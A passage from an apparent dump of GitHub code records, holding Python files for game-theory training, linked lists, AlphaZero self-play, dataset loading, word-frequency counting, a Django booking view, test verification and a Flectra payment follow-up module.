lcfr(self, game, probabilities):\n '''Linear Counterfactual Regret Minimization\n probabilities is a vector of probabilities that the ith player will reach the current node\n '''\n\n #base case\n if game.isTerminal:\n return game.getPayout()\n \n #we should consider the chance node case if performance is unsatisfactory\n #note that chance node outcomes can be precomputed\n infoset = game.infoSet()\n infohash = hash(infoset)\n actions = game.getActions()\n player = infoset['player']\n\n #create the node if it doesn't exist\n if infohash not in self.strategySum.get(player, {}):\n self.strategySum[player][infohash] = np.zeros(5)\n self.regretSum[player][infohash] = np.zeros(5)\n self.strategy[player][infohash] = np.zeros(5)\n\n #get the strategy for the current player\n strategy = self.getStrategy(infohash, player)\n actionUtilities = np.array([[0,0,0,0,0],[0,0,0,0,0]])\n nodeUtilities = np.zeros(2)\n \n #for each action, recursively call lcfr\n for action in actions:\n gameCopy = self.copyGame(game)\n actIndx = self.actionIndex[action]\n print(gameCopy.infoSet())\n gameCopy.makeMove(action)\n print(gameCopy.infoSet(), '\\n')\n probabilityCopy = np.copy(probabilities)\n probabilityCopy[player] *= strategy[player][infohash][actIndx]\n actionUtilities[actIndx] = self.lcfr(gameCopy, probabilityCopy)\n\n for playerIndex in range(2):\n nodeUtilities[playerIndex] += actionUtilities[playerIndex][actIndx] * strategy[player][infohash][actIndx]\n\n #from here collect the counterfactual regrets\n for i in range(5):\n counterfacProb = 1\n for i in range(2):\n if i != player: counterfacProb *= probabilities[i]\n \n #update the regrets\n regret = actionUtilities[actIndx][actions[i]] - nodeUtilities[player]\n self.regretSum[player][infoset][actions[i]] += counterfacProb * regret\n self.strategySum[player][infoset][actions[i]] += counterfacProb * strategy[actions[i]]\n\n return nodeUtilities\n\n\n def train(self, iterations):\n '''Trains the CFR algorithm for the given number of iterations'''\n\n for i in range(iterations):\n game = bloodRiver()\n game.beginGame(i%2)\n self.lcfr(game, np.array([1, 1]))\n\n #compute the average strategy\n for player in range(2):\n for infoset in self.strategySum[player]:\n normalizingSum = 0\n for i in range(len(self.strategySum[player][infoset])):\n normalizingSum += self.strategySum[player][infoset][i]\n for i in range(len(self.strategySum[player][infoset])):\n if normalizingSum > 0:\n self.strategySum[player][infoset][i] /= normalizingSum\n else:\n self.strategySum[player][infoset][i] = 1/len(self.strategySum[player][infoset])\n\n return self.strategySum\n\n\nif __name__ == '__main__':\n trainer = bloodyStream()\n trainer.train(1)","repo_name":"ppxscal/Python-CFR-Implementation","sub_path":"cfr/cfr.py","file_name":"cfr.py","file_ext":"py","file_size_in_byte":5576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40143493046","text":"class Node(object):\r\n\r\n def __init__(self, value, node=None):\r\n self.value = value\r\n self.next = node\r\n \r\n\r\n def __str__(self):\r\n return repr(self)\r\n\r\n\r\n def __repr__(self):\r\n return \"%s->%s\" % (self.value, self.next.value)\r\n\r\nclass LinkTableUnderflow(ValueError):\r\n pass\r\n\r\n\r\nclass LinkTable(object):\r\n\r\n def __init__(self, values='', head=None):\r\n self.head = head\r\n if not values:\r\n return\r\n if isinstance(values, dict):\r\n values = values.items()\r\n values = list(values)\r\n values.reverse()\r\n for value in values:\r\n node = Node(value)\r\n node.next = self.head\r\n self.head = node\r\n\r\n def __len__(self):\r\n temp = self.head\r\n count = 0\r\n while temp is not None:\r\n count +=1\r\n temp = temp.next\r\n return count\r\n\r\n def is_empty(self):\r\n if self.head is None:\r\n return True\r\n return False\r\n \r\n def prepend(self, value):\r\n node = Node(value, self.head)\r\n self.head = node\r\n\r\n def pop(self):\r\n if self.head is None:\r\n raise LinkTableUnderflow(\"in pop\")\r\n node = self.head\r\n self.head = self.head.next\r\n return node\r\n\r\n def append(self, value):\r\n node = Node(value)\r\n if self.head is None:\r\n self.head = node\r\n return\r\n temp = self.head\r\n while temp.next is not None:\r\n temp = temp.next\r\n temp.next = node\r\n\r\n def pop_last(self):\r\n if self.is_empty():\r\n raise LinkTableUnderflow(\"in pop_last\")\r\n temp = self.head\r\n if temp.next is None:\r\n value = None\r\n self.head = None\r\n return value\r\n while temp.next.next is not None:\r\n temp = temp.next\r\n value = temp.next.value\r\n temp.next = None\r\n return value\r\n\r\n\r\n def __str__(self):\r\n if self.head is None:\r\n return []\r\n List = []\r\n temp = self.head\r\n while temp:\r\n List.append(temp.value)\r\n temp = temp.next\r\n return str(List)\r\n\r\n\r\ndef delete_last_n_node(linktable, n):\r\n length = len(linktable)\r\n if length == 0:\r\n raise LinkTableUnderflow(\"linktable is empty\")\r\n if n <= 0: \r\n raise ValueError(\"n must larger than 0\")\r\n if length < n:\r\n raise LinkTableUnderflow(\"out of index\")\r\n forward_index = length - n\r\n temp = linktable.head\r\n count = 0\r\n while temp.next is not None:\r\n count +=1\r\n if count == forward_index:\r\n break\r\n temp = temp.next\r\n node = temp.next\r\n temp.next = temp.next.next\r\n return node\r\n\r\ndef new_delete_last_n_node(linktable, n):\r\n fast = linktable.head\r\n while n > 0:\r\n fast = fast.next\r\n n -= 1\r\n if fast is None:\r\n return linktable.head.next\r\n slow = linktable.head\r\n while fast.next is not None:\r\n fast = fast.next\r\n slow = slow.next\r\n slow.next = slow.next.next\r\n return linktable.head\r\n\r\nif __name__ == \"__main__\":\r\n # link_table = LinkTable([2,1,4,5,7,9,6])\r\n # print(link_table)\r\n # print(delete_last_n_node(link_table, 3))\r\n # print(link_table)\r\n\r\n\r\n link_table = LinkTable([2,1,4])\r\n print(link_table)\r\n print(LinkTable(head=new_delete_last_n_node(link_table, 3)))\r\n\r\n","repo_name":"GuilongMa/python-Data-Structures-and-Algorithmic-Programs","sub_path":"链表/删除链表倒数的第n个结点.py","file_name":"删除链表倒数的第n个结点.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43075993722","text":"import multiprocessing as mp\nimport os\nimport time\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom tensorboardX import SummaryWriter\nfrom torch import optim\n\nfrom alphazero import preprocess\nfrom alphazero.mcts import AZAgent\nfrom alphazero.network import Network\nfrom alphazero.replaybuffer import ReplayBuffer\nfrom connect5 import agent\nfrom connect5 import board as connect5_board\nfrom connect5 import types\n\nUSE_CUDA = torch.cuda.is_available()\n\n# 학습 설정값을 저장하는 딕셔너리\nTRAINING_CONFIG = {\n 'BOARD_SIZE': 7,\n\n 'LEARNING_RATE': 1e-2,\n 'WEIGHT_DECAY': 1e-4,\n\n 'ROUNDS_PER_MOVE': 800,\n 'PUCT': 1.25,\n 'PUCT_INIT': 1.25,\n 'PUCT_BASE': 19652,\n\n 'MCTS_NOISE': True,\n 'MCTS_ALPHA': 0.03,\n 'MCTS_EPS': 0.25,\n\n 'SELFPLAY_WORKERS': 12,\n 'START_TRAINING': 1280,\n 'EPOCH': 1,\n 'BATCH_SIZE': 128,\n 'CAPACITY': 10000,\n\n 'LOAD_CHECKPOINT': 0\n}\n\nbuffer = ReplayBuffer(TRAINING_CONFIG['CAPACITY'])\n\ntarget_network = Network(TRAINING_CONFIG['BOARD_SIZE'])\n\nif USE_CUDA:\n target_network = target_network.cuda()\n\nif TRAINING_CONFIG['LOAD_CHECKPOINT'] != 0:\n target_network.load_state_dict(torch.load(f'models/checkpoint-{TRAINING_CONFIG[\"LOAD_CHECKPOINT\"]}.bin'))\n\n# 자가 대국을 하는 작업자\ndef selfplay_worker(queue):\n while True:\n game = connect5_board.GameState.new_game(TRAINING_CONFIG['BOARD_SIZE'])\n agent = AZAgent(TRAINING_CONFIG['BOARD_SIZE'], target_network.state_dict(), \\\n TRAINING_CONFIG['MCTS_NOISE'], TRAINING_CONFIG['MCTS_ALPHA'], TRAINING_CONFIG['MCTS_EPS'], \\\n TRAINING_CONFIG['ROUNDS_PER_MOVE'], TRAINING_CONFIG['PUCT_INIT'], TRAINING_CONFIG['PUCT_BASE'])\n\n while not game.is_over():\n move = agent.select_move(game, TRAINING_CONFIG['PUCT'])\n game = game.apply_move(move)\n\n queue.put((game.winner, agent.train_data))\n\n# 프로그램의 메인 함수\ndef main():\n step = TRAINING_CONFIG['LOAD_CHECKPOINT']\n num_game = 0\n\n manager = mp.Manager()\n queue = manager.Queue()\n\n writer = SummaryWriter()\n\n opt = optim.SGD(target_network.parameters(), lr=TRAINING_CONFIG['LEARNING_RATE'], weight_decay=TRAINING_CONFIG['WEIGHT_DECAY'], momentum=0.9)\n\n if not os.path.exists('models'):\n os.mkdir('models')\n\n # 작업자를 만드는 부분\n workers = []\n for _ in range(TRAINING_CONFIG['SELFPLAY_WORKERS']):\n p = mp.Process(target=selfplay_worker, args=(queue,))\n p.daemon = True\n p.start()\n\n workers.append(p)\n\n # 학습을 돌리는 코드\n while True:\n try:\n winner, result = queue.get()\n buffer.push(winner, result)\n \n num_game += 1\n print(f'selfplay game #{num_game}')\n\n if len(buffer) < TRAINING_CONFIG['START_TRAINING']:\n continue\n\n step += 1\n print(f'start training #{step}')\n\n total_pi = 0\n total_v = 0\n total_loss = 0\n\n for _ in range(TRAINING_CONFIG['EPOCH']):\n states, pis, values = buffer.sample(TRAINING_CONFIG['BATCH_SIZE'])\n if USE_CUDA:\n states, pis, values = states.cuda(), pis.cuda(), values.cuda()\n\n opt.zero_grad()\n out_pi, out_v = target_network(states)\n out_pi = F.log_softmax(out_pi, dim=1)\n\n loss_pi = -(out_pi * pis).sum(dim=1).mean()\n loss_v = F.mse_loss(out_v, values)\n \n loss = loss_pi + loss_v\n loss.backward()\n opt.step()\n\n total_pi = loss_pi.item()\n total_v = loss_v.item()\n total_loss = loss.item()\n\n buffer.clear_half()\n torch.save(target_network.state_dict(), f'models/checkpoint-{step}.bin')\n\n writer.add_scalar('train total loss', total_loss / TRAINING_CONFIG['EPOCH'], step)\n writer.add_scalar('train pi loss', total_pi / TRAINING_CONFIG['EPOCH'], step)\n writer.add_scalar('train value loss', total_v / TRAINING_CONFIG['EPOCH'], step)\n except KeyboardInterrupt:\n print('Stopping training...')\n\n for worker in workers:\n worker.terminate()\n break\n\n except Exception as e:\n print('Exception', e)\n continue\n\nif __name__ == '__main__':\n mp.set_start_method('spawn')\n main()\n","repo_name":"utilForever/2020-OSS-Winter-AlphaZero","sub_path":"2 - Examples/2 - Day 2/2 - AlphaZero/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"71923491395","text":"import os \nimport sys \nimport torch.utils.data as data\nimport torch \nimport numpy as np \nfrom PIL import Image \n\nimport transformers\n\n\nfrom dataset.refer import REFER\n\n\n\n\nclass ReferDataset(data.Dataset):\n def __init__(self,\n args,\n image_transforms=None,\n max_tokens=20, \n split='train',\n eval_mode=False) -> None:\n \"\"\"\n parameters:\n args: argparse obj\n image_transforms: transforms apply to image and mask\n max_tokens: determined the max length of token \n split: ['train','val','testA','testB']\n eval_mode: whether in training or evaluating \n \"\"\"\n\n self.classes=[]\n self.image_transforms=image_transforms\n self.split=split\n self.refer=REFER(args.refer_data_root, args.dataset, args.splitBy)\n\n self.max_tokens=max_tokens\n\n ref_ids=self.refer.getRefIds(split=self.split)\n img_ids=self.refer.getImgIds(ref_ids)\n # change dict to list\n all_imgs=self.refer.Imgs\n self.imgs=list(all_imgs[i] for i in img_ids)\n \n self.ref_ids=ref_ids\n # input_ids -> input sentence 对应的id\n # attention_masks -> mask掉pad的部分\n self.input_ids=[]\n self.attention_masks=[]\n self.tokenizer=transformers.BertTokenizer.from_pretrained(args.bert_tokenizer)\n\n self.eval_mode=eval_mode\n # pad_id=[0]\n pad_id = self.tokenizer.convert_tokens_to_ids(self.tokenizer.tokenize('[PAD]'))\n\n for r in self.ref_ids:\n # for each image\n ref=self.refer.Refs[r]\n # List[Tensor] Tensor shape [1,len]\n sentences_for_ref=[]\n attentions_for_ref=[]\n # for each sentence\n for i,(el,sent_id) in enumerate(zip(ref['sentences'],ref['sent_ids'])):\n sentence_raw=el['raw']\n attention_mask = [0] * self.max_tokens\n padded_input_ids = [0] * self.max_tokens\n # `add_special_tokens=True`加入\n input_ids = self.tokenizer.encode(text=sentence_raw, add_special_tokens=True)\n\n # truncation of tokens\n input_ids = input_ids[:self.max_tokens]\n\n padded_input_ids[:len(input_ids)] = input_ids\n attention_mask[:len(input_ids)] = [1]*len(input_ids)\n\n sentences_for_ref.append(torch.tensor(padded_input_ids).unsqueeze(0))\n attentions_for_ref.append(torch.tensor(attention_mask).unsqueeze(0))\n # List[List[Tensor]]\n self.input_ids.append(sentences_for_ref)\n self.attention_masks.append(attentions_for_ref)\n\n def get_classes(self):\n return self.classes\n \n def __len__(self):\n return len(self.ref_ids)\n \n def __getitem__(self,index):\n this_ref_id=self.ref_ids[index]\n this_img_id=self.refer.getImgIds(this_ref_id)\n this_img=self.refer.Imgs[this_img_id[0]]\n \n img=Image.open(os.path.join(self.refer.IMAGE_DIR,this_img['file_name'])).convert(\"RGB\")\n\n ref=self.refer.loadRefs(this_ref_id)\n this_sent_ids=ref[0]['sent_ids']\n\n ref_mask=np.array(self.refer.getMask(ref[0])['mask'])\n annot=np.zeros(ref_mask.shape)\n annot[ref_mask==1]=1\n # convert it to a Pillow image\n annot = Image.fromarray(annot.astype(np.uint8), mode=\"P\")\n\n if self.image_transforms is not None:\n # involves transform from PIL to tensor and mean and std normalization\n img, target = self.image_transforms(img, annot)\n else:\n target=annot\n \n if self.eval_mode:\n \"\"\"\n torch.Size([3, 384, 384]) torch.Size([384, 384]) torch.Size([1, 20, 3]) torch.Size([1, 20, 3])\n \"\"\"\n embedding=[]\n att=[]\n\n for s in range(len(self.input_ids[index])):\n e=self.input_ids[index][s]\n a=self.attention_masks[index][s]\n\n embedding.append(e.unsqueeze(-1))\n att.append(a.unsqueeze(-1))\n # all sentence\n tensor_embeddings = torch.cat(embedding, dim=-1)\n attention_mask = torch.cat(att, dim=-1)\n \n else: # for training random select one sentence\n \"\"\"\n torch.Size([3, 384, 384]) torch.Size([384, 384]) torch.Size([1, 20]) torch.Size([1, 20])\n \"\"\"\n choice_sent=np.random.choice(len(self.input_ids[index]))\n tensor_embeddings = self.input_ids[index][choice_sent]\n attention_mask = self.attention_masks[index][choice_sent]\n \n return img,target,tensor_embeddings,attention_mask\n\n ","repo_name":"lifeGWT/LAVT-pytorch","sub_path":"dataset/ReferDataset.py","file_name":"ReferDataset.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"17512713967","text":"\"\"\"\n Count words from a list of .txt files\n\n Based on:\n\n https://github.com/explosion/spacy-dev-resources/blob/master/training/word_freqs.py\n\"\"\"\n\nfrom __future__ import unicode_literals, print_function\n\nimport plac\nimport io\nimport spacy\n\nfrom spacy.lang.nb import Norwegian\n\nfrom spacy.strings import StringStore\nfrom spacy.attrs import ORTH\nfrom spacy.tokenizer import Tokenizer\nfrom spacy.vocab import Vocab\nimport spacy.util\n\nfrom pathlib import Path\n\nfrom preshed.counter import PreshCounter\nfrom joblib import Parallel, delayed\nfrom pathlib import Path\nimport multiprocessing\n\nfrom tqdm import tqdm\n\n\ndef parallelize(func, iterator, n_jobs):\n Parallel(n_jobs=n_jobs)(delayed(func)(*item) for item in iterator)\n\n\ndef count_freqs(input_loc, output_loc):\n print(\"{} => {}\".format(input_loc, output_loc))\n\n tokenizer = Norwegian.Defaults.create_tokenizer()\n counts = PreshCounter()\n\n with open(input_loc, \"r\") as file:\n for line in file:\n doc = tokenizer(line.strip())\n doc.count_by(ORTH, counts=counts)\n\n with open(output_loc, \"w\", encoding=\"utf8\") as file_:\n for orth, freq in counts:\n string = tokenizer.vocab.strings[orth]\n if not string.isspace():\n file_.write(\"%d\\t%s\\n\" % (freq, string))\n\n\ndef merge_counts(locs, out_loc):\n string_map = StringStore()\n counts = PreshCounter()\n df_counts = PreshCounter()\n\n for loc in tqdm(locs):\n with io.open(loc, \"r\", encoding=\"utf8\") as file_:\n for line in file_:\n freq, word = line.strip().split(\"\\t\", 1)\n orth = string_map.add(word)\n counts.inc(orth, int(freq))\n df_counts.inc(orth, 1)\n\n with io.open(out_loc, \"w\", encoding=\"utf8\") as file_:\n for orth, freq in counts:\n word = string_map[orth]\n file_.write(\"{}\\t{}\\t{}\\n\".format(freq, df_counts[orth], repr(word)))\n\n\n@plac.annotations(\n input_dir=(\"Dir with .txt files to analyze\", \"positional\"),\n result_path=(\"File to write frequencies\", \"positional\"),\n skip_existing=(\"Skip file if it already exists\", \"option\", \"s\", bool),\n n_jobs=(\"Number of workers\", \"option\", \"n\", int),\n)\ndef main(\n input_dir, result_path, skip_existing=True, n_jobs=multiprocessing.cpu_count()\n):\n tasks = []\n outputs = []\n\n input_dir = Path(input_dir)\n\n for input_path in input_dir.rglob(\"*.txt\"):\n output_path = input_path.with_suffix(\".freq\")\n outputs.append(output_path)\n\n if not skip_existing or not output_path.exists():\n tasks.append((input_path, output_path))\n\n if tasks:\n parallelize(count_freqs, tasks, n_jobs)\n\n print(\"Merging result to {}\".format(result_path))\n merge_counts(outputs, result_path)\n\n\nif __name__ == \"__main__\":\n plac.call(main)\n","repo_name":"mladenzivo/spacy-nb","sub_path":"tools/word_freq.py","file_name":"word_freq.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38550353926","text":"\"\"\"\nMust be run after main.py has been run so that `./out/observations.csv` exists.\n\"\"\"\n\nimport pandas as pd\nfrom typing import List, Tuple, Iterable\nimport re\n\n\ndef split_namespace_and_notation(locations: Iterable[str]) -> Iterable[Tuple[str, str]]:\n re_pattern = re.compile(\"^(.*/)(.*)$\")\n for location in locations:\n matches = re_pattern.match(location)\n namespace = matches.group(1)\n notation = matches.group(2)\n yield namespace, notation\n\n\ndef do_da_split():\n group_concept_base_uri = \"http://gss-data.org.uk/data/gss_data/trade/international-trade-in-services-by\" \\\n \"-subnational-areas-of-the-uk#concept-scheme/location\"\n nuts_group_notation = \"nuts\"\n stat_geog_group_notation = \"statistical-geographies\"\n nuts_group_uri = f\"{group_concept_base_uri}/{nuts_group_notation}\"\n stat_geog_group_uri = f\"{group_concept_base_uri}/{stat_geog_group_notation}\"\n\n group_codelist_values = pd.DataFrame({\n \"URI\": [nuts_group_uri, stat_geog_group_uri],\n \"Notation\": [nuts_group_notation, stat_geog_group_notation],\n \"Label\": [\"NUTS\", \"UK Government Statistical Geographies\"],\n \"Parent URI\": [None, None]\n })\n\n observations = pd.read_csv(\"./out/observations.csv\")\n unique_locations = observations.Location.unique()\n\n namespace_and_notations = list(split_namespace_and_notation(unique_locations))\n notations = [notation for namespace, notation in namespace_and_notations]\n\n parent_uri = [\n nuts_group_uri if namespace == \"http://data.europa.eu/nuts/code/\" else stat_geog_group_uri\n for namespace, _ in namespace_and_notations\n ]\n\n codelist = pd.DataFrame({\n \"URI\": unique_locations,\n \"Notation\": notations,\n \"Label\": [None for x in namespace_and_notations],\n \"Parent URI\": parent_uri\n })\n\n codelist = pd.concat([group_codelist_values, codelist], axis=0)\n\n codelist[\"Sort Priority\"] = range(0, len(codelist[\"URI\"]))\n codelist.to_csv(\"./codelists/location.csv\", index=False)\n\n\nif __name__ == \"__main__\":\n do_da_split()\n","repo_name":"GSS-Cogs/family-trade","sub_path":"datasets/ONS-International-trade-in-services-by-subnational-areas-of-the-UK/generate-locations-codelist.py","file_name":"generate-locations-codelist.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12008939002","text":"from django.shortcuts import render,redirect\n\n\nfrom lifecare.models import Booking\n# Create your views here.\n\n'''def lifecare(request):\n return render(request,'index.html')'''\n\n\ndef booking(request):\n if request.method == 'GET':\n return render(request, 'index.html')\n else:\n name = request.POST.get('name')\n email = request.POST.get('email')\n day = request.POST.get('day')\n date = request.POST.get('date')\n doc = request.POST.get('doc')\n textarea_message = request.POST.get('textarea_message')\n Booking.objects.create(name=name, email=email,day=day,date=date,doc=doc,textarea_message=textarea_message)\n return redirect('lifecare:booking')\n\n\n","repo_name":"anondep73/batch1","sub_path":"lifecare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5258755286","text":"import os, sys\nimport glob\nimport numpy as np\n\n\n############# Verifies the output of PAOFLOW #############\n## Usage:\n## \"python check_test.py [test_directory_pattern] [output_directory] [reference_directory]\"\n##\n## Default:\n## \"python check_test.py example* output Reference\"\n##\n##########################################################\n\ndef verifyData ( subdir, datPattern, refPattern ):\n\n ########## User Defined Variables ##########\n showFileResult = False # Show PASS or FAIL for each file\n showErrors = False # Flag to print out error values\n tolerance = 0.01 # Percentage that error can deviate from average to pass tests\n ######### End User Defined Variables ########\n\n print(('Verifying .dat files for %s' % subdir))\n\n # Get new data files and existing reference data files\n datFiles = glob.glob(datPattern+'/*.dat')\n refFiles = glob.glob(refPattern+'/*.dat')\n\n # Verify that .dat files exist in reference directory\n if len(refFiles) == 0:\n print('\\tReference directory is empty or does not exist.\\n')\n return\n\n # Sort the lists of files\n datFiles.sort()\n refFiles.sort()\n\n # Quick function to replace directory path\n rp = lambda f, p : [r.replace(p,'') for r in f]\n\n if len(datFiles) == 0:\n print('\\tNo output files found\\n')\n return\n\n # Ensure that the lists are identical\n if rp(datFiles, datFiles[0].split('/')[0]) != rp(refFiles, refFiles[0].split('/')[0]):\n print('\\tList of calculated .dat files does not match reference files.\\n')\n return\n\n # Compare data files\n maxError = -1. # Will store maximum error value\n maxErrorIndex = -1 # Will store file index of maximum error value\n maxRelError = -1. # Store maximum relative error\n maxRelErrorIndex = -1 # Store file index of maximum relative error value\n allDataResult = 'PASS' # Stores status of the entire example calculation\n for i in range(len(datFiles)):\n \n # Gather data from files\n df = open(datFiles[i], 'r')\n rf = open(refFiles[i], 'r')\n dl = np.array([[float(s) for s in l.split()] for l in df.readlines()]).transpose()\n rl = np.array([[float(s) for s in l.split()] for l in rf.readlines()]).transpose()\n df.close()\n rf.close()\n\n nCol = len(dl)\n nRow = len(dl[0])\n\n # Compute absolute error and data range excluding the first column\n absoluteError = np.sum(abs(abs(dl[1:nCol, :]) - abs(rl[1:nCol, :])), axis=1) / nRow\n dataRange = np.amax(np.amax(dl[1:nCol, :], axis=1), axis=0) - np.amin(np.amin(dl[1:nCol, :], axis=1), axis=0)\n relativeError = []\n\n # Compare computed error against data average\n validData = True\n for j in range(nCol-1):\n\n # Store maximum absolute error\n if absoluteError[j] > maxError:\n maxError = absoluteError[j]\n maxErrorIndex = i\n\n # Compute relative error\n relError = absoluteError[j]/dataRange\n relativeError.append(relError)\n\n # Store maximum relative error\n if relError > maxRelError:\n maxRelError = relError\n maxRelErrorIndex = i\n\n # Ensure that relative error is less than user defined tolerance\n if relError > tolerance:\n validData = False\n\n if np.isnan(absoluteError).any() or np.isnan(relativeError).any():\n validData = False\n\n if validData:\n result = 'PASS'\n else:\n allDataResult = result = 'FAIL'\n\n if showErrors:\n print(('\\t%s:\\n\\t\\tMean Absolute Errors: %s\\n\\t\\tRelative Errors: %s' % (datFiles[i], absoluteError, relativeError)))\n if showFileResult:\n print(('\\t%s ---------- [%s]\\n' % (datFiles[i], result)))\n\n if showErrors:\n print(('The maximum absolute error in %s was %E in %s' % (subdir, maxError, datFiles[maxErrorIndex])))\n print(('The maximum relative error in %s was %E in %s' % (subdir, maxRelError, datFiles[maxRelErrorIndex])))\n\n print(('%s ---------- [%s]\\n' % (subdir, allDataResult)))\n\n\ndef main():\n\n # Look for test directory pattern argument\n if len(sys.argv) > 1:\n alldir = sorted(glob.glob(sys.argv[1]))\n else:\n alldir = sorted(glob.glob('example*'))\n\n # Assign default reference directory pattern, then look for argument\n datPattern = 'output'\n if len(sys.argv) > 2:\n datPattern = sys.argv[2]\n\n # Assign default reference directory pattern, then look for argument\n refPattern = 'Reference'\n if len(sys.argv) > 3:\n refPattern = sys.argv[3]\n\n # Verify data for each test matching the input or default pattern\n for n in range(len(alldir)):\n os.chdir(alldir[n])\n subdir = str(os.getcwd()).split('/')[len(str(os.getcwd()).split('/'))-1]\n verifyData(subdir, datPattern, refPattern)\n os.chdir('../')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"marcobn/PAOFLOW","sub_path":"examples/check_test.py","file_name":"check_test.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"19738411838","text":"from lxml import etree\nfrom flectra import api, fields, models, _\nfrom flectra.exceptions import UserError\nfrom flectra.tools.misc import formatLang\nfrom functools import reduce\n\nclass ResPartner(models.Model):\n _inherit = \"res.partner\"\n\n @api.multi\n def write(self, vals):\n if vals.get(\"user_id\", False):\n for partner in self:\n if partner.user_id != \\\n vals[\"user_id\"]:\n responsible_partner_id = self.env[\"res.users\"].browse(\n vals['user_id']).partner_id.id\n self.env[\"mail.thread\"].message_post(\n body=_(\"You became responsible to do the next \"\n \"action for the payment follow-up of\") +\n \" \" +\n partner.name + \" \",\n type='comment',\n subtype=\"mail.mt_comment\",\n model='res.partner', res_id=partner.id,\n partner_ids=[responsible_partner_id])\n return super(ResPartner, self).write(vals)\n\n @api.multi\n def _compute_latest_fup_details(self):\n company = False\n for partner in self:\n if not partner.company_id:\n company = self.env.user.company_id.id\n else:\n company = self.env['res.company'].browse(\n partner.company_id.id).id\n amls = partner.move_line_ids\n latest_date = latest_level = latest_days = False\n latest_level_without_lit = latest_days_without_lit = False\n for aml in amls:\n if (aml.company_id.id == company) and \\\n aml.payment_followup_line_id and \\\n (not latest_days or\n latest_days < aml.payment_followup_line_id.waiting_period):\n latest_days = aml.payment_followup_line_id.waiting_period\n latest_level = aml.payment_followup_line_id.id\n if (aml.company_id.id == company) and \\\n (not latest_date or (aml.date_payment_followup and\n latest_date < aml.date_payment_followup)):\n latest_date = aml.date_payment_followup\n if (aml.company_id.id == company) and \\\n (not aml.blocked) and \\\n (aml.payment_followup_line_id and\n (not latest_days_without_lit or\n latest_days_without_lit <\n aml.payment_followup_line_id.waiting_period)):\n latest_days_without_lit = \\\n aml.payment_followup_line_id.waiting_period\n latest_level_without_lit = aml.payment_followup_line_id.id\n partner.followup_date = latest_date\n partner.followup_line_id = latest_level\n partner.wo_legal_process_followup_line_id = \\\n latest_level_without_lit\n\n @api.multi\n def _compute_payment_rel_details(self):\n company = self.env.user.company_id\n current_date = fields.Date.today()\n for partner in self:\n worst_due_date = False\n amt_tobe_paid = overdue_amt = 0.0\n for aml in partner.move_line_ids:\n if (aml.company_id == company):\n date_maturity = aml.date_maturity or aml.date\n if not worst_due_date or date_maturity < worst_due_date:\n worst_due_date = date_maturity\n amt_tobe_paid += aml.amount_balance\n if (date_maturity <= current_date):\n overdue_amt += aml.amount_balance\n partner.amt_tobe_paid = amt_tobe_paid\n partner.overdue_amt = overdue_amt\n partner.expected_payment_date = worst_due_date\n\n @api.multi\n def _get_partner_manual_action(self, partner_ids):\n for partner in self.browse(partner_ids):\n action_text = \"\"\n f_level = partner.wo_legal_process_followup_line_id\n todo_activity = f_level.todo_activity\n if partner.upcoming_activity:\n action_text = (partner.upcoming_activity or ''\n ) + \"\\n\" + (todo_activity or '')\n else:\n action_text = todo_activity or ''\n action_date = \\\n partner.upcoming_activity_date or \\\n fields.Date.today()\n user_id = False\n if partner.user_id:\n user_id = partner.user_id.id\n else:\n p = f_level.user_id\n user_id = p and p.id or False\n partner.write({'upcoming_activity_date': action_date,\n 'upcoming_activity': action_text,\n 'user_id': user_id})\n\n @api.multi\n def _get_partner_fup_report_print(self, data):\n data['partner_ids'] = self.ids\n datas = {\n 'ids': self.ids,\n 'model': 'payment.followup',\n 'form': data\n }\n return self.env.ref(\n 'payment_followup.action_report_payment_followup').report_action(\n self, data=datas)\n\n @api.multi\n def print_overdue_payment(self):\n assert (len(self.ids) == 1)\n company_id = self.env.user.company_id.id\n if not self.env['account.move.line'].search([\n ('partner_id', '=', self.ids[0]),\n ('account_id.user_type_id.type', '=', 'receivable'),\n ('full_reconcile_id', '=', False),\n ('company_id', '=', company_id),\n '|', ('date_maturity', '=', False),\n ('date_maturity', '<=', fields.Date.today()),\n ]):\n raise UserError(_('Error! \\nThe partner does not have any '\n 'accounting entries to print in the overdue '\n 'report for the current company.'))\n self.message_post(body=_('Printed overdue payments report'))\n wizard_partner_ids = [self.ids[0] * 10000 + company_id]\n followup_ids = self.env['payment.followup'].search(\n [('company_id', '=', company_id)])\n if not followup_ids:\n raise UserError(_('Error! \\nThere is no followup plan '\n 'defined for the current company.'))\n data = {\n 'date': fields.date.today(),\n 'payment_followup_id': followup_ids[0] and followup_ids[0].id,\n }\n return self.env['res.partner'].browse(\n wizard_partner_ids)._get_partner_fup_report_print(data)\n\n @api.multi\n def send_overdue_mail(self):\n\n context = self.env.context.copy()\n context['followup'] = True\n mtp = self.env['mail.template']\n unknown_mails = 0\n template = 'payment_followup.email_template_payment_followup_default'\n for partner in self:\n partners_to_email = [child for child in partner.child_ids if\n child.type == 'invoice' and child.email]\n if not partners_to_email and partner.email:\n partners_to_email = [partner]\n if partners_to_email:\n level = partner.wo_legal_process_followup_line_id\n for partner_to_email in partners_to_email:\n if level and level.reminder_mail and \\\n level.template_id and \\\n level.template_id.id:\n level.template_id.with_context(context).send_mail(\n partner_to_email.id)\n else:\n template_id = self.env.ref(template).id\n mtp.browse(template_id).send_mail(\n partner_to_email.id)\n if partner not in partners_to_email:\n partner.message_post(body=_(\n 'Overdue email sent to %s' % ', '.join(\n ['%s <%s>' % 